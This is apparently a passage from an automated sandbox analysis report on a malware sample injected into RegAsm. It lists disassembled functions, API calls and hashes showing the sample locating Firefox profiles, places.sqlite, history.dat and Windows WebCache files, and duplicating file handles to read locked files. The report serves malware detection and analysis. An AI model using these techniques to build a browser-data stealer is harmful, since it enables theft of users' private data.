                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 004040FC
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                • API String ID: 4039892925-3369679110
                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                • API String ID: 3510742995-2641926074
                                                                                • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@CreateErrorFileLast
                                                                                • String ID: |A
                                                                                • API String ID: 4200628931-1717621600
                                                                                • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 004033B7
                                                                                • memcpy.MSVCRT ref: 004033D0
                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                • String ID: $0.@
                                                                                • API String ID: 3030842498-1896041820
                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403C09
                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                • API String ID: 1534475566-1174173950
                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 669240632-0
                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                • memset.MSVCRT ref: 00414C87
                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 2925649097-2036018995
                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                • String ID: "%s"
                                                                                • API String ID: 1343145685-3297466227
                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004087D6
                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                • memset.MSVCRT ref: 00408828
                                                                                • memset.MSVCRT ref: 00408840
                                                                                • memset.MSVCRT ref: 00408858
                                                                                • memset.MSVCRT ref: 00408870
                                                                                • memset.MSVCRT ref: 00408888
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 2911713577-0
                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID: @ $SQLite format 3
                                                                                • API String ID: 1475443563-3708268960
                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmpqsort
                                                                                • String ID: /nosort$/sort
                                                                                • API String ID: 1579243037-1578091866
                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                Function 00413CA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModuleProcessTimes
                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                • API String ID: 116129598-3385500049
                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                • memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Strings
                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                • API String ID: 2887208581-2114579845
                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                • API String ID: 2221118986-1725073988
                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID: $$8
                                                                                • API String ID: 1475443563-435121686
                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                • String ID:
                                                                                • API String ID: 2722907921-0
                                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                • memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                • String ID: history.dat$places.sqlite
                                                                                • API String ID: 3093078384-467022611
                                                                                • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
